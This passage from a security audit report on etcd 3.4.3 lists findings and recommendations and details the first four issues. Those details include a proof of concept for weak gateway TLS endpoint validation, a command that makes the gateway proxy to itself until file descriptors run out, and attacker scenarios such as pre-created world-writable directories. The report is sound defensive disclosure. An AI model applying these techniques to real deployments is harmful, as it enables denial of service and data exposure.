gateway users may make inaccurate\n \nassumptions.\n \n \n \nExamples: ​\nTOB-ETCD-001: Gateway TLS endpoint validation only confirms TCP reachability​\n,\n \nor ​\nTOB-ETCD-004: Gateway TLS endpoint validation only applies to endpoints detected in\n \nDNS SRV records​\n. Another example can be seen in the WAL implementation, where each\n \nWAL entry has semi-trusted metadata, resulting in a potential crash of quorum instances if\n \na malicious leader propagates malicious entries. See further details in ​\nTOB-ETCD-006: An\n \nentry with large index causes panic in WAL.ReadAll method​\n.\n \n \nTo improve the security posture of etcd, Trail of Bits recommends first addressing the\n \nfindings in this report, prioritizing short-term recommendations, and integrating long-term\n \nrecommendations into future releases. Once fixes are applied and recommendations\n \naddressed, a future assessment should be performed to ensure the fixes are adequate and\n \ndo not introduce additional security risks.\n \n \n \n© 2020 Trail of Bits\n \n Linux Foundation Etcd Assessment | 2\n \n After the assessment was completed, the Etcd team followed-up with the assessment team\n \nto review findings related to the gateway. Further details about how they were addressed\n \nwere included in ​\nAppendix D​\n.\n \n \n \n \n© 2020 Trail of Bits\n \n Linux Foundation Etcd Assessment | 3\n \n P r o j e c t D a s h b o a r d\n \nApplication Summary\n \nName\n \nEtcd\n \nVersion\n \nRelease 3.4.3\n \nType\n \nDatastore\n \nPlatforms\n \nGo\n \n \nEngagement Summary\n \nDates\n \nJanuary 11–21, 2020\n \nMethod\n \nWhitebox\n \nConsultants Engaged\n \n2\n \nLevel of Effort\n \n4 person-weeks\n \n \nVulnerability Summary\n \n \nTotal High-Severity Issues\n \n1\n \n◼\n \nTotal Medium-Severity Issues\n \n6\n \n◼ ◼ ◼ ◼ ◼ ◼\n \nTotal Low-Severity Issues\n \n6\n \n◼ ◼ ◼ ◼ ◼ ◼\n \nTotal Informational-Severity Issues\n \n4\n \n◼ ◼ ◼ ◼\n \nTotal\n \n17\n \n \n \n \nCategory Breakdown\n \nData Validation\n \n5\n \n◼ ◼ ◼ ◼ ◼\n \nAccess Controls\n \n2\n \n◼ ◼\n \nCryptography\n \n4\n \n◼ ◼ ◼ ◼\n \nLogging\n \n2\n \n◼ ◼\n \nAuthentication\n \n1\n \n◼\n \nData Exposure\n \n1\n \n◼\n \nDenial of Service\n \n1\n \n◼\n \nConfiguration\n \n1\n \n◼\n \nTotal\n \n17\n \n \n \n© 2020 Trail of Bits\n \n Linux Foundation Etcd Assessment | 4\n \n E n g a g e m e n t G o a l s\n \nThe engagement was scoped to provide a security assessment of etcd as a whole.\n \n \nSpecifically, we sought to answer the following questions:\n \n \n●\nIs there any way an attacker could impede service discovery?\n \n●\nIs there any way a malicious etcd leader could impact its peers?\n \n●\nAre the filesystem permissions used by etcd secure?\n \n●\nAre there any major problems with the use of cryptography in etcd?\n \n●\nAre there any correctness issues in error-handling within etcd?\n \n●\nDoes etcd provide the necessary logging for sensitive operations?\n \n●\nAre there any major concerns with the use of the gateway and proxy functionality of\n \netcd?\n \nC o v e r a g e\n \nAuthentication and authorization. ​\nThe methods used to authenticate and authorize\n \nclients with etcd were reviewed, including the TLS authentication assumptions of the\n \nancillary proxies and gateways.\n \n \n \nFilesystem permissions.​\n We reviewed assumptions around file and directory permissions,\n \nfocusing on enforcement and validation of permissions, including the impact of package\n \nimplementation semantics on these validations.\n \n \nCryptography. ​\nWe reviewed TLS authentication methods and assumptions, focusing on\n \nclient-facing communications.\n \n \nDefault settings.​\n The defaults used by etcd were reviewed for their impact on the system’s\n \nsecurity posture.\n \n \nData validation.​\n We reviewed data validation throughout the system, focusing on areas\n \nwhere data from external sources is retrieved and subsequently parsed, such as service\n \ndiscovery and RAFT operations.\n \n \nError-handling.​\n Error-handling was reviewed to identify areas where etcd could fail in an\n \nunexpected way, or otherwise operate in an unintended fashion. Additional focus was\n \nplaced on packages used in critical locations which may be modified later, such as packages\n \nassisting in WAL file operations.\n \n \nLogging.​\n We reviewed logging, focusing on correctness of reporting and ability to log and\n \nimplement alerting on security-critical events such as authentication.\n \n \nService discovery.​\n Our review of service discovery operations focused on problems that\n \ncould prevent peers from successfully completing discovery, or could otherwise impact the\n \nstability of discovered peers.\n \n \n© 2020 Trail of Bits\n \n Linux Foundation Etcd Assessment | 5\n \n  \nWAL operations.​\n The package used to interact with WAL files was reviewed for problems\n \nthat could lead to the destabilization of RAFT operations, or any of the peers attempting to\n \nform consensus.\n \n \nGateway and proxy.​\n The gateway and proxy functionalities of etcd were reviewed to\n \nensure operations such as TLS connection handling and load balancing were correct. We\n \nfocused primarily on issues such as resource exhaustion, authentication, and TOCTOU.\n \n \n \n \n© 2020 Trail of Bits\n \n Linux Foundation Etcd Assessment | 6\n \n R e c o m m e n d a t i o n s S u m m a r y\n \nThis section aggregates all the recommendations made during the engagement. Short-term\n \nrecommendations address the immediate causes of issues. Long-term recommendations\n \npertain to the development process and long-term design goals.\n \nS h o r t T e r m\n \nWhen the trusted CA flag is provided to the etcd gateway, ensure dialing uses a TLS\n \nconnection instead of a TCP connection.​\n This will ensure all connections from gateway to\n \nendpoint are appropriately authenticated. ​\nTOB-ETCD-001\n \n \nThe gateway should filter endpoints to exclude those that resolve to the listening\n \naddress of the gateway.​\n This will help ensure circular references are more difficult to\n \nconfigure by users. ​\nTOB-ETCD-002\n \n \nWhen using utilities such as ​\nos.MkdirAll\n​\n, check all directories in the path and\n \nvalidate their owner and permissions before performing operations on those that\n \nalready exist.​\n This will help avoid situations in which sensitive information is written to a\n \npre-existing attacker-controlled path. ​\nTOB-ETCD-003\n \n \nEnsure TLS authentication is applied to endpoints provided in the ​\n--endpoints\n​\n flag on\n \nthe etcd gateway.​\n This will ensure consistent functionality across both endpoint discovery\n \nmethods. ​\nTOB-ETCD-004\n \n \nAuthenticate each endpoint using the provided CA certificate upon each connection\n \nestablished by the etcd gateway.​\n This will help prevent any endpoint that’s only been\n \nauthenticated once from being trusted. ​\nTOB-ETCD-005\n \n \nEnsure proper size checks on the final ​\ne.Index-w.start.Index-\n​\n1\n​\n in each WAL entry,\n \nand gracefully error if the size is too large for the given slice.​\n This will avoid a hard\n \ncrash if an invalid WAL entry is encountered. ​\nTOB-ETCD-006\n \n \nProvide a size check on the ​\ndecodeRecord\n​\n method and gracefully exit if the frame size\n \nis larger than the maximum slice length.​\n This will prevent crashing due to out-of-bounds\n \nindexing of the allocated array if the WAL entry has been mutated. ​\nTOB-ETCD-007\n \n \nConsider improving the password requirements to a higher minimum character\n \namount. ​\nThis will make it harder for an attacker to brute-force authentication of an etcd\n \nuser. ​\nTOB-ETCD-008\n \n \nEnsure an appropriate error is logged when an authentication attempt has failed due\n \nto a client certificate authentication.​\n Ideally, each authentication method should\n \ngenerate unique log entries to allow operators to differentiate interactions. ​\nTOB-ETCD-009\n \n \n \n© 2020 Trail of Bits\n \n Linux Foundation Etcd Assessment | 7\n \n Ensure the ​\ndbCompactionKeysCounter\n​\n variable properly represents the etcd\n \noperations that have occurred.​\n This will help ensure users can properly track and alert\n \non metrics. ​\nTOB-ETCD-010\n \n \nDo not accept a negative value of automatic compaction retention.​\n Data validation\n \nshould ensure the provided values are within the expected range. ​\nTOB-ETCD-011\n \n \nDo not store credentials in the WAL.​\n Instead, consider having a centralized location for\n \ncredentials that can be hardened appropriately, limiting the attack surface for sensitive\n \ninformation. ​\nTOB-ETCD-012\n \n \nInitialize a decoder in the ​\nwal.Create function\n​\n, so the WAL* may decode information\n \nin the ​\nwal.ReadAll\n​\n function.​\n This will prevent users from encountering an error due to an\n \nuninitialized decoder. ​\nTOB-ETCD-013\n \n \nEnsure proper validation for all values retrieved and parsed from outside sources.\n \nThis will help reduce the effect of a third-party system compromise on the integrity of etcd.\n \nTOB-ETCD-014\n \n \nDisable weak ciphers and require a special flag to enable them.​\n By default, only enable\n \nthe modern ciphers as recommended by the ​\nMozilla Security/Server side document​\n.\n \nTOB-ETCD-015\n \n \nDeprecate the insecure defaults and promote more secure usage of etcd. ​\nFor\n \nexample, list all insecure options at once during startup, describing the problems and\n \nsuggesting fixes, and linking to a documentation page that would show how to set up etcd\n \nsecurely. ​\nTOB-ETCD-016\n \n \nReview configurations that use InsecureSkipVerify.​\n Use insecure TLS selectively and\n \nwith caution. There are few purposes for which unverified certificates should be supported.\n \nTOB-ETCD-017\n \n \n \n \n© 2020 Trail of Bits\n \n Linux Foundation Etcd Assessment | 8\n \n L o n g T e r m\n \nEnsure all dialers are using the appropriate features for their expected protocols.\n \nConsider indexing the supported protocols—where they are used and how they are\n \nenforced—in a centralized fashion. ​\nTOB-ETCD-001\n \n \nEnsure error values are appropriately reported instead of silently failing.​\n Consider\n \nimplementing a generic graceful exit routine. ​\nTOB-ETCD-002\n \n \nEnumerate files and directories for their expected permissions overall, and build\n \nvalidation to ensure appropriate permissions are applied before creation and upon\n \nuse.​\n Ideally, this validation should be centrally defined and used throughout the\n \napplication as a whole. ​\nTOB-ETCD-003\n \n \nEnsure TLS connections are always used for gateway endpoints where the protocol\n \nschema is HTTPS.​\n This will force a fast failure for an endpoint that cannot successfully\n \nauthenticate with the gateway, and ensure the client only connects to an authenticated\n \nbackend. ​\nTOB-ETCD-004\n \n \nConsider implementing periodic endpoint validation to ensure all specified endpoints\n \nare not only reachable, but also authenticated.​\n This will allow proactive detection of\n \nunhealthy endpoints, as well as those no longer able to successfully authenticate with the\n \ngiven configuration. ​\nTOB-ETCD-005\n \n \nRestructure WALs to be limited by entry index and size instead of just size.​\n This will\n \nhelp prevent mutated entries from inducing a panic when parsing the WAL. ​\nTOB-ETCD-006\n \n \nConsider building a method to identify expected ranges for valid values into the\n \nformat for the WAL.​\n This will assist in additional validations of the WAL file, allowing the\n \ndetection of corruption or manipulation. ​\nTOB-ETCD-007\n \n \nConsider adopting a specific standard for password requirements, such as NIST SP\n \n800-204, and enforce it across the codebase.​\n ​\nTOB-ETCD-008\n \n \nValidate whether all significant program paths are logged distinguishably and\n \ndocumented appropriately.​\n This will help ensure proper logging and detections can be\n \nbuilt on each authentication method. ​\nTOB-ETCD-009\n \n \nExpand unit tests to include testing metrics endpoints to ensure changes to the\n \nmetrics endpoints still produce the expected behavior. ​\nThis will prevent future\n \nintroduction of breaking changes and ensure the stability of loggable metrics.\n \nTOB-ETCD-010\n \n \nAccount for negative values provided as the auto compaction value.​\n This should also\n \nbe tested within the corresponding ​\nTestAutoCompactionModeParse\n​\n test. ​\nTOB-ETCD-011\n \n \n \n© 2020 Trail of Bits\n \n Linux Foundation Etcd Assessment | 9\n \n Check if file permissions used by etcd are within an acceptable range.​\n If the\n \npermissions are too broad, etcd should exit with an error for further investigation.\n \nTOB-ETCD-012\n \n \nAdd validation before the decoder is accessed in WAL functions. ​\nIf the decoder is not\n \ninitialized, error out or initialize appropriately. ​\nTOB-ETCD-013\n \n \nConsider consolidating validation routines into a specific set of helper libraries used\n \nacross the codebase.​\n Avoid using ​\nstrconv.Atoi\n​\n without validating the parsed value.\n \nTOB-ETCD-014\n \n \nDetermine the most popular ciphers used by etcd clients and consider removing\n \nweak ciphers from support.​\n This will help prevent clients from accidentally configuring an\n \ninsecure cipher when using etcd. ​\nTOB-ETCD-015\n \n \nMake etcd secure by default, by requiring a minimally secure launch configuration.\n \nTo ease development, testing, and debugging, consider providing a simpler, but less secure\n \nconfiguration under​\n --insecure\n​\n. ​\nTOB-ETCD-016\n \n \nAvoid use of insecure TLS configurations altogether.​\n Verify certificates in all scenarios\n \nby default. ​\nTOB-ETCD-017\n \n \n \n \n© 2020 Trail of Bits\n \n Linux Foundation Etcd Assessment | 10\n \n F i n d i n g s S u m m a r y\n \n#\n \nTitle\n \nType\n \nSeverity\n \n1\n \nGateway TLS endpoint validation only\n \nconfirms TCP reachability\n \nCryptography\n \nMedium\n \n2\n \nThe gateway can include itself as an\n \nendpoint, resulting in resource\n \nexhaustion\n \nDenial of\n \nService\n \nHigh\n \n3\n \nDirectories created via os.MkdirAll are not\n \nchecked for permissions\n \nAccess Controls\n \nMedium\n \n4\n \nGateway TLS authentication only applies\n \nto endpoints detected in DNS SRV records\n \nCryptography\n \nMedium\n \n5\n \nTOCTOU of gateway endpoint\n \nauthentication\n \nAuthentication\n \nLow\n \n6\n \nAn entry with large index causes panic in\n \nWAL.ReadAll method\n \nData Validation\n \nMedium\n \n7\n \nA large slice causes panic in\n \ndecodeRecord method\n \nData Validation\n \nMedium\n \n8\n \nNo minimum password length\n \nAccess Controls\n \nMedium\n \n9\n \nInaccurate logging of authentication\n \nattempts for users with CN-based auth\n \nonly\n \nLogging\n \nLow\n \n10\n \nThe “Total number of db keys compacted”\n \nmetric is never changed\n \nLogging\n \nInformational\n \n11\n \nAuto compaction retention can be set to\n \nnegative value causing a compaction loop\n \nor a crash\n \nData Validation\n \nLow\n \n12\n \nUser credentials are stored in WAL logs in\n \nplaintext\n \nData Exposure\n \nLow\n \n \n© 2020 Trail of Bits\n \n Linux Foundation Etcd Assessment | 11\n \n 13\n \nNull pointer exception when calling\n \nwal.Readall after wal.Create\n \nData Validation\n \nInformational\n \n14\n \nSubmitting a -1 for cluster node size\n \nresults in an index out-of-bound panic\n \nduring service discovery\n \nData Validation\n \nLow\n \n15\n \nInsecure ciphers are enabled by default\n \nCryptography\n \nLow\n \n16\n \netcd is insecure by default\n \nConfiguration\n \nInformational\n \n17\n \nUse of TLS InsecureSkipVerify\n \nCryptography\n \nInformational\n \n \n \n \n \n© 2020 Trail of Bits\n \n Linux Foundation Etcd Assessment | 12\n \n 1 . G a t e w a y T L S e n d p o i n t v a l i d a t i o n o n l y c o n f i r m s T C P r e a c h a b i l i t y\n \nSeverity: Medium\nDifficulty: Low\n \nType: Cryptography\nFinding ID: TOB-ETCD-001\n \nTarget: ​\npkg/transport/tls.go, etcdmain/util.go\n \n \n \nDescription\n \nSecure endpoint validation is performed by the ​\netcd gateway start\n​\n command when the\n \n--discovery-srv\n​\n flag is enabled. However, as currently implemented, it only validates TCP\n \nreachability, effectively allowing connections to an endpoint that doesn't accept TLS\n \nconnections through the HTTPS URL.\n \n \nThe ​\ntransport.ValidateSecureEndpoints\n​\n function (Figure TOB-ETCD-001.1) is used to\n \nperform validation of formatted HTTPS endpoints within the ​\netcdmain.discoverEndpoints\n \nfunction (Figure TOB-ETCD-001.2) used by both ​\netcdmain.mustNewClient\n​\n and\n \netcdmain.startGateway\n​\n.\n \n \n \nThe validation works in two steps. First, if the endpoint does not start with HTTPS, the\n \nendpoint is not considered secure. Second, if the address is unreachable (with HTTPS\n \nstripped from the beginning), it is considered insecure. Because of these two steps, if you\n \nprepend HTTPS to any address listening for TCP (but not TLS) connections, validation will\n \nsucceed. The provided certificate file and server name are ignored when performing the\n \nDial\n​\n operation because the ​\nnet.Dial\n​\n function does not initiate a TLS handshake—it only\n \nestablishes a TCP connection to the endpoint.\n \n \nThe proof of concept in Figure TOB-ETCD-001.3 is an extracted example of how\n \ntransport.ValidateSecureEndpoints\n​\n is used within the ​\netcdmain.discoverEndpoints\n \nfunction. The certificate authority (CA) certificate used in the proof of concept can also be\n \nseen in Figure TOB-ETCD-001.4. Figures TOB-ETCD-001.5–6 show a Python simple HTTP\n \nserver (not using TLS) and the output of the proof of concept (PoC). As the PoC output\n \nshows, it successfully validated the HTTPS-formatted URL to the simple HTTP server, and to\n \nGoogle’s HTTP endpoint.\n \n \n// ValidateSecureEndpoints scans the given endpoints against tls info, returning only those\n \n// endpoints that could be validated as secure.\n \nfunc\n​\n \n​\nValidateSecureEndpoints\n​\n(\n​\ntlsInfo\n​\n \n​\nTLSInfo\n​\n, \n​\neps\n​\n []\n​\nstring\n​\n) ([]\n​\nstring\n​\n, \n​\nerror\n​\n) {\n \nt, err \n​\n:=\n​\n \n​\nNewTransport\n​\n(tlsInfo, \n​\n5\n​\n*time.Second)\n \nif\n​\n err != \n​\nnil\n​\n {\n \nreturn\n​\n \n​\nnil\n​\n, err\n \n}\n \nvar\n​\n errs []\n​\nstring\n \nvar\n​\n endpoints []\n​\nstring\n \nfor\n​\n _, ep \n​\n:=\n​\n \n​\nrange\n​\n eps {\n \nif\n​\n !strings.\n​\nHasPrefix\n​\n(ep, \n​\n\"https://\"\n​\n) {\n \nerrs = \n​\nappend\n​\n(errs, fmt.\n​\nSprintf\n​\n(\n​\n\"\n​\n%q\n​\n is insecure\"\n​\n, ep))\n \ncontinue\n \n \n© 2020 Trail of Bits\n \n Linux Foundation Etcd Assessment | 13\n \n }\n \nconn, cerr \n​\n:=\n​\n t.\n​\nDial\n​\n(\n​\n\"tcp\"\n​\n, ep[\n​\nlen\n​\n(\n​\n\"https://\"\n​\n):])\n \nif\n​\n cerr != \n​\nnil\n​\n {\n \nerrs = \n​\nappend\n​\n(errs, fmt.\n​\nSprintf\n​\n(\n​\n\"\n​\n%q\n​\n failed to dial (\n​\n%v\n​\n)\"\n​\n, ep, cerr))\n \ncontinue\n \n}\n \nconn.\n​\nClose\n​\n()\n \nendpoints = \n​\nappend\n​\n(endpoints, ep)\n \n}\n \nif\n​\n \n​\nlen\n​\n(errs) != \n​\n0\n​\n {\n \nerr = fmt.\n​\nErrorf\n​\n(\n​\n\"\n​\n%s\n​\n\"\n​\n, strings.\n​\nJoin\n​\n(errs, \n​\n\",\"\n​\n))\n \n}\n \nreturn\n​\n endpoints, err\n \n}\n \nFigure TOB-ETCD-001.1: The ​\nValidateSecureEndpoints\n​\n function definition\n \n(​\npkg/transport/tls.go#L23-L49\n​\n).\n \n \n...\n \n// confirm TLS connections are good\n \ntlsInfo \n​\n:=\n​\n transport.TLSInfo{\n \nTrustedCAFile\n​\n: ca,\n \nServerName\n​\n: dns,\n \n}\n \n \n \nif\n​\n lg != \n​\nnil\n​\n {\n \nlg.\n​\nInfo\n​\n(\n \n\"validating discovered SRV endpoints\"\n​\n,\n \nzap.\n​\nString\n​\n(\n​\n\"srv-server\"\n​\n, dns),\n \nzap.\n​\nStrings\n​\n(\n​\n\"endpoints\"\n​\n, endpoints),\n \n)\n \n} \n​\nelse\n​\n {\n \nplog.\n​\nInfof\n​\n(\n​\n\"validating discovered endpoints \n​\n%v\n​\n\"\n​\n, endpoints)\n \n}\n \n \n \nendpoints, err = transport.\n​\nValidateSecureEndpoints\n​\n(tlsInfo, endpoints)\n \n...\n \nFigure TOB-ETCD-001.2: The snippet of ​\ndiscoverEndpoints\n​\n where ​\nValidateSecureEndpoints\n \nis used (​\netcdmain/util.go#L51-L67\n​\n).\n \n \npackage\n​\n main\n \n \nimport\n​\n (\n \n\"fmt\"\n \n\"go.etcd.io/etcd/pkg/transport\"\n \n)\n \n \nfunc\n​\n \n​\nmain\n​\n() {\n \n// Amazon CA\n \nca \n​\n:=\n​\n \n​\n\"./ca.crt\"\n \ndns \n​\n:=\n​\n \n​\n`amazon.com`\n \n \nres, err \n​\n:=\n​\n transport.\n​\nValidateSecureEndpoints\n​\n(\n \ntransport.TLSInfo{\n \n \n© 2020 Trail of Bits\n \n Linux Foundation Etcd Assessment | 14\n \n TrustedCAFile: ca,\n \nServerName: dns,\n \n},\n \n[]\n​\nstring\n​\n{\n​\n\"http://0.0.0.0:8000\"\n​\n, \n​\n\"https://0.0.0.0:8000\"\n​\n,\n \n \n​\n\"http://www.google.com:80\"\n​\n, \n​\n\"https://www.google.com:80\"\n​\n})\n \n \n// Print the output\n \nfmt.\n​\nPrintln\n​\n(res, err)\n \n}\n \nFigure TOB-ETCD-001.3: A proof of concept showing the failure to validate an endpoint as using\n \nHTTPS.\n \n \n-----BEGIN CERTIFICATE-----\n \nMIIDQTCCAimgAwIBAgITBmyfz5m/jAo54vB4ikPmljZbyjANBgkqhkiG9w0BAQsF\n \nADA5MQswCQYDVQQGEwJVUzEPMA0GA1UEChMGQW1hem9uMRkwFwYDVQQDExBBbWF6\n \nb24gUm9vdCBDQSAxMB4XDTE1MDUyNjAwMDAwMFoXDTM4MDExNzAwMDAwMFowOTEL\n \nMAkGA1UEBhMCVVMxDzANBgNVBAoTBkFtYXpvbjEZMBcGA1UEAxMQQW1hem9uIFJv\n \nb3QgQ0EgMTCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBALJ4gHHKeNXj\n \nca9HgFB0fW7Y14h29Jlo91ghYPl0hAEvrAIthtOgQ3pOsqTQNroBvo3bSMgHFzZM\n \n9O6II8c+6zf1tRn4SWiw3te5djgdYZ6k/oI2peVKVuRF4fn9tBb6dNqcmzU5L/qw\n \nIFAGbHrQgLKm+a/sRxmPUDgH3KKHOVj4utWp+UhnMJbulHheb4mjUcAwhmahRWa6\n \nVOujw5H5SNz/0egwLX0tdHA114gk957EWW67c4cX8jJGKLhD+rcdqsq08p8kDi1L\n \n93FcXmn/6pUCyziKrlA4b9v7LWIbxcceVOF34GfID5yHI9Y/QCB/IIDEgEw+OyQm\n \njgSubJrIqg0CAwEAAaNCMEAwDwYDVR0TAQH/BAUwAwEB/zAOBgNVHQ8BAf8EBAMC\n \nAYYwHQYDVR0OBBYEFIQYzIU07LwMlJQuCFmcx7IQTgoIMA0GCSqGSIb3DQEBCwUA\n \nA4IBAQCY8jdaQZChGsV2USggNiMOruYou6r4lK5IpDB/G/wkjUu0yKGX9rbxenDI\n \nU5PMCCjjmCXPI6T53iHTfIUJrU6adTrCC2qJeHZERxhlbI1Bjjt/msv0tadQ1wUs\n \nN+gDS63pYaACbvXy8MWy7Vu33PqUXHeeE6V/Uq2V8viTO96LXFvKWlJbYK8U90vv\n \no/ufQJVtMVT8QtPHRh8jrdkPSHCa2XV4cdFyQzR1bldZwgJcJmApzyMZFo6IQ6XU\n \n5MsI+yMRQ+hDKXJioaldXgjUkK642M4UwtBV8ob2xJNDd2ZhwLnoQdeXeGADbkpy\n \nrqXRfboQnoZsG4q5WTP468SQvvG5\n \n-----END CERTIFICATE-----\n \nFigure TOB-ETCD-001.4: An arbitrary Amazon CA certificate.\n \n \n$ python3 -m http.server\n \nServing HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...\n \nFigure TOB-ETCD-001.3: A basic HTTP server.\n \n \n$ go run main.go\n \n \n[https://0.0.0.0:8000 https://www.google.com:80] \"http://0.0.0.0:8000\" is\n \ninsecure,\"http://www.google.com:80\" is insecure\n \nFigure TOB-ETCD-001.5: The proof of concept output from Figure TOB-ETCD-001.1.\n \n \nExploit Scenario\n \nAn etcd endpoint is misconfigured without client TLS authentication behind a gateway.\n \nBecause the gateway fails to properly perform TLS authentication, the server is added as a\n \nvalid endpoint, and a client connects without TLS authentication. The gateway selects the\n \nclient-TLS-disabled endpoint, and client data is transmitted in the clear.\n \n \nRecommendation\n \n \n© 2020 Trail of Bits\n \n Linux Foundation Etcd Assessment | 15\n \n Short term, when the trusted CA flag is provided to the etcd gateway, ensure dialing uses a\n \nTLS connection instead of a TCP connection. This will ensure all connections from gateway\n \nto endpoint are appropriately authenticated.\n \n \nLong term, ensure all dialers are using the appropriate features for their expected\n \nprotocols. Consider indexing the supported protocols—where they are used and how they\n \nare enforced—in a centralized fashion.\n \n \n \n \n© 2020 Trail of Bits\n \n Linux Foundation Etcd Assessment | 16\n \n 2 . T h e g a t e w a y c a n i n c l u d e i t s e l f a s a n e n d p o i n t , r e s u l t i n g i n r e s o u r c e\n \ne x h a u s t i o n\n \nSeverity: High\nDifficulty: High\n \nType: Denial of Service\nFinding ID: TOB-ETCD-002\n \nTarget: ​\netcdmain/gateway.go\n \n \nDescription\n \nThe etcd gateway is a simple TCP proxy to allow for basic service discovery and access.\n \nHowever, it is possible to include the gateway address as an endpoint. This results in a\n \ndenial of service, since the endpoint can become stuck in a loop of requesting itself until\n \nthere are no more available file descriptors to accept connections on the gateway.\n \n \n./etcd gateway start --endpoints=http://127.0.0.1:23790\n \nFigure TOB-ETCD-002.1: Starting the gateway with the endpoints flag including the gateway\n \naddress and port.\n \n \n{\"level\":\"info\",\"ts\":1579890333.565956,\"caller\":\"tcpproxy/userspace.go:90\",\n\"msg\":\"ready to proxy client requests\",\"endpoints\":[\"127.0.0.1:23790\"]}\n \naccept tcp 127.0.0.1:23790: accept: too many open files\n \nFigure TOB-ETCD-002.2: The error message when the etcd gateway crashes (recovered through a\n \nbasic ​\nfmt.Printf\n​\n instruction at the point of error, due to error-logging not capturing the error).\n \n \nExploit Scenario\n \nAn attacker compromises the DNS server used to return ​\nSRV\n​\n records for an etcd gateway.\n \nThe attacker configures the DNS server to return the address of each gateway, causing the\n \ngateways to connect to themselves and exhaust file descriptor resources.\n \n \nRecommendation\n \nShort term, the gateway should filter endpoints to exclude those that resolve to the\n \nlistening address of the gateway. This will help ensure circular references are more difficult\n \nfor users to configure.\n \n \nLong term, ensure error values are appropriately reported instead of silently failing.\n \nConsider implementing a generic graceful exit routine.\n \n \n \n \n© 2020 Trail of Bits\n \n Linux Foundation Etcd Assessment | 17\n \n 3 . D i r e c t o r i e s c r e a t e d v i a o s . M k d i r A l l a r e n o t c h e c k e d f o r p e r m i s s i o n s\n \nSeverity: Medium\nDifficulty: High\n \nType: Access Controls\nFinding ID: TOB-ETCD-003\n \nTarget: ​\nM\n​\nultiple locations\n \n \nDescription\n \netcd creates certain directory paths with restricted access permissions (0700) by using the\n \nos.MkdirAll\n​\n. This function does not perform any permission checks when a given\n \ndirectory path exists already. Then an attacker can create a directory used by etcd with\n \nbroad permissions before etcd attempts the same, which allows the attacker to read\n \nsensitive data produced by etcd’s operations.\n \n \nThis happens in the following places:\n \n \n●\nIn the ​\nTouchDirAll\n​\n utility function, which also checks if the end directory is writable\n \n(Figure TOB-ETCD-003.1). However, if a user controls the directory, they might\n \nchange its permission after ​\nTouchDirAll\n​\n checks it. This function is used for actions\n \nsuch as snapshot and WAL directories creation.\n \n●\nIn the ​\nSelfCert\n​\n function (Figure TOB-ETCD-003.2) used for ​\nclientCerts\n​\n directory\n \ncreation.\n \n●\nIn the ​\nstartProxy\n​\n function (Figure TOB-ETCD-003.3) for ​\nproxy\n​\n directory creation.\n \n \nfunc\n​\n \n​\nTouchDirAll\n​\n(\n​\ndir\n​\n \n​\nstring\n​\n) \n​\nerror\n​\n {\n \n// If path is already a directory, MkdirAll does nothing\n \n// and returns nil.\n \nerr \n​\n:=\n​\n os.\n​\nMkdirAll\n​\n(dir, PrivateDirMode)\n \nif\n​\n err != \n​\nnil\n​\n {\n \n// if mkdirAll(\"a/text\") and \"text\" is not\n \n// a directory, this will return syscall.ENOTDIR\n \nreturn\n​\n err\n \n}\n \nreturn\n​\n \n​\nIsDirWriteable\n​\n(dir)\n \n}\n \nFigure TOB-ETCD-003.1: The ​\nTouchDirAll\n​\n function definition\n \n(​\npkg/fileutil/fileutil.go#L48-L58\n​\n).\n \n \nfunc\n​\n \n​\nSelfCert\n​\n(\n​\nlg\n​\n *\n​\nzap\n​\n.\n​\nLogger\n​\n, \n​\ndirpath\n​\n \n​\nstring\n​\n, \n​\nhosts\n​\n []\n​\nstring\n​\n, \n​\nadditionalUsages\n \n...\n​\nx509\n​\n.\n​\nExtKeyUsage\n​\n) (\n​\ninfo\n​\n \n​\nTLSInfo\n​\n, \n​\nerr\n​\n \n​\nerror\n​\n) {\n \nif\n​\n err = os.\n​\nMkdirAll\n​\n(dirpath, \n​\n0700\n​\n); err != \n​\nnil\n​\n {\n \nreturn\n \n}\n \ninfo.Logger = lg\n \n \ncertPath \n​\n:=\n​\n filepath.\n​\nJoin\n​\n(dirpath, \n​\n\"cert.pem\"\n​\n)\n \nkeyPath \n​\n:=\n​\n filepath.\n​\nJoin\n​\n(dirpath, \n​\n\"key.pem\"\n​\n)\n \n \n​\n// (...) - rest of the code\n \nFigure TOB-ETCD-003.2: The ​\nSelfCert\n​\n function definition\n \n(​\npkg/transport/listener.go#L115-L123\n​\n).\n \n \n© 2020 Trail of Bits\n \n Linux Foundation Etcd Assessment | 18\n \n  \n \ncfg.ec.Dir = filepath.\n​\nJoin\n​\n(cfg.ec.Dir, \n​\n\"proxy\"\n​\n)\n \nerr = os.\n​\nMkdirAll\n​\n(cfg.ec.Dir, fileutil.PrivateDirMode)\n \nif\n​\n err != \n​\nnil\n​\n {\n \nreturn\n​\n err\n \n}\n \n \nvar\n​\n peerURLs []\n​\nstring\n \nclusterfile \n​\n:=\n​\n filepath.\n​\nJoin\n​\n(cfg.ec.Dir, \n​\n\"cluster\"\n​\n)\n \n \nb, err \n​\n:=\n​\n ioutil.\n​\nReadFile\n​\n(clusterfile)\n \nFigure TOB-ETCD-003.3: The ​\nstartProxy\n​\n function definition (​\netcdmain/etcd.go#L360-L369\n​\n).\n \n \nExploit Scenario\n \nEve has unprivileged access to Alice's server, where an etcd server will be deployed or\n \nupdated to a new version that introduces new directories/paths. Eve knows that etcd will\n \nuse certain directory paths, so they create them with ​\n0777\n​\n permissions. This allows Eve to\n \nprevent etcd from running correctly or (in some cases) make etcd leak sensitive\n \ninformation.\n \n \nRecommendation\n \nShort term, when using utilities such as ​\nos.MkdirAll\n​\n, check all directories in the path and\n \nvalidate their owner and permissions before performing operations on them. This will help\n \navoid situations where sensitive information is written to a pre-existing attacker-controlled\n \npath.\n \n \nLong term, enumerate files and directories for their expected permissions overall, and\n \nbuild validation to ensure appropriate permissions are applied before creation and upon\n \nuse. Ideally, this validation should be centrally defined and used throughout the application\n \nas a whole.\n \n \n \n \n© 2020 Trail of Bits\n \n Linux Foundation Etcd Assessment | 19\n \n 4 . G a t e w a y T L S a u t h e n t i c a t i o n o n l y a p p l i e s t o e n d p o i n t s d e t e c t e d i n D N S\n \nS R V r e c o r d s\n \nSeverity: Medium\nDifficulty: Low\n \nType: Cryptography\nFinding ID: TOB-ETCD-004\n \nTarget: ​\netcdmain/gateway.go\n \n \nDescription\n \nWhen starting a gateway, TLS authentication will only be attempted on endpoints identified\n \nin DNS ​\nSRV\n​\n records for a given domain, which occurs in the ​\ndiscoverEndpoints\n​\n function.\n \nNo authentication is performed against endpoints provided in the ​\n--endpoints\n​\n flag.\n 